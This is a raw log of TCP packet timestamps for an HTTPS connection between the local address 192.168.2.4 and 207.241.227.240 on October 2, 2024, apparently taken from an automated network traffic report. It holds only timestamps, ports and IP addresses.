                                                          Oct 2, 2024 05:30:41.823872089 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.823966026 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.823985100 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.824033022 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.873605013 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.873631954 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.873816013 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.873857975 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.873908043 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.874532938 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.874561071 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.874612093 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.874634027 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.874671936 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.875919104 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.875955105 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.876019955 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.876044035 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.876105070 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.891168118 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.891202927 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.891366005 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.891412973 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.891458988 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.892030954 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.892050982 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.892124891 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.892137051 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.892172098 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.892188072 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.941730976 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.941760063 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.941924095 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.941956997 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.942006111 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.942631006 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.942651987 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.942703009 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.942717075 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.942759991 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.943867922 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.943886042 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.943948030 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.943965912 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.944001913 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.960124969 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.960150003 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.960221052 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.960257053 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.960279942 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.960295916 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.961226940 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.961245060 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.961302042 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.961319923 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.961369038 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.961994886 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.962012053 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.962215900 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.962233067 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.962285042 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.010236979 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.010261059 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.010377884 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.010412931 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.010579109 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.011177063 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.011200905 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.011236906 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.011244059 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.011266947 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.011290073 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.027981043 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.028002977 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.028079033 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.028111935 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.028155088 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.029198885 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.029212952 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.029263973 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.029278040 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.029310942 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.030396938 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.030414104 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.030463934 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.030476093 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.030519962 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.046463013 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.046484947 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.046571016 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.046602964 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.046741962 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.078620911 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.078644037 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.078795910 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.078841925 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.078994036 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.079687119 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.079704046 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.079761982 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.079782009 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.079819918 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.096939087 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.096966028 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.097064972 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.097100973 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.097265005 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.097848892 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.097871065 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.097934008 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.097943068 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.097982883 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.114748001 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.114777088 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.114948988 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.115029097 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.115202904 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.115863085 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.115880966 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.115962029 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.115978003 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.116080046 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.145226955 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.145256042 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.145492077 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.145523071 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.145580053 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.146317005 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.146338940 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.146399975 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.146421909 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.146456957 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.146476984 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.165075064 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.165098906 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.165167093 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.165199995 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.165241003 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.166207075 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.166223049 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.166275978 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.166290998 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.166328907 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.183810949 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.183834076 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.183974028 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.184009075 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.184171915 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.184797049 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.184818029 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.184885979 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.184894085 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.184942007 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.202100992 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.202130079 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.202193975 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.202225924 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.202280045 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.202280045 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.282155991 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.282181978 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.282349110 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.282423019 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.282497883 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.283005953 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.283021927 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.283094883 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.283111095 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.283173084 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.283173084 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.284521103 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.284543991 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.284621954 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.284636974 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.284698009 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.285449982 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.285468102 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.285531044 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.285547018 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.285603046 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.286159039 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.286175013 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.286231041 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.286245108 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.286309004 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.288017988 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.288038969 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.288083076 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.288096905 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.288141966 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.288161039 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.288971901 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.288999081 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.289062977 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.289077997 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.289133072 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.289674044 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.289689064 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.289740086 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.289755106 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.289802074 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.300829887 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.300852060 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.300920963 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.300940037 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.301163912 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.301165104 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.377083063 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.377154112 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.377391100 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.377391100 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.377425909 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.377482891 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.378351927 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.378406048 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.378447056 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.378467083 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.378489017 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.378520966 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.379576921 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.379626036 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.379654884 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.379669905 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.379688025 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.379717112 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.380340099 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.380389929 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.380405903 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.380414963 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.380440950 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.380460024 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.381320000 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.381370068 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.381397963 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.381411076 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.381428957 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.381454945 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.382275105 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.382324934 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.382359982 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.382379055 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.382395029 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.382415056 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.383259058 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.383302927 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.383326054 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.383337021 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.383358955 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.383377075 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.388000011 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.388027906 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.388098001 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.388115883 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.388155937 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.463685036 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.463742971 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.463814974 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.463845015 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.463867903 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.463892937 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.464622974 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.464665890 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.464699984 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.464710951 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.464735985 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.464754105 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.466092110 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.466130018 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.466176033 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.466186047 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.466212034 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.466228962 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.466985941 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.467001915 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.467072964 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.467080116 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.467128992 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.467830896 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.467858076 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.467922926 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.467932940 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.467976093 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.486738920 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.486768007 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.486861944 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.486880064 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.486924887 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.487735033 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.487752914 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.487807035 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.487814903 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.487854958 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.488749981 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.488768101 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.488835096 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.488842964 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.488893986 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.550468922 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.550502062 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.550781012 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.550816059 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.550874949 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.551446915 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.551464081 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.551526070 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.551534891 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.551585913 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.554565907 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.554585934 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.554687977 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.554699898 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.554758072 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.555507898 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.555525064 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.555603981 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.555613995 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.555659056 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.556372881 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.556387901 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.556451082 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.556463003 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.556503057 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.573648930 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.573673964 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.573754072 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.573779106 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.573822975 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.574166059 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.574182034 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.574237108 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.574244976 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.574285030 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.622225046 CEST44349730207.241.227.240192.168.2.4
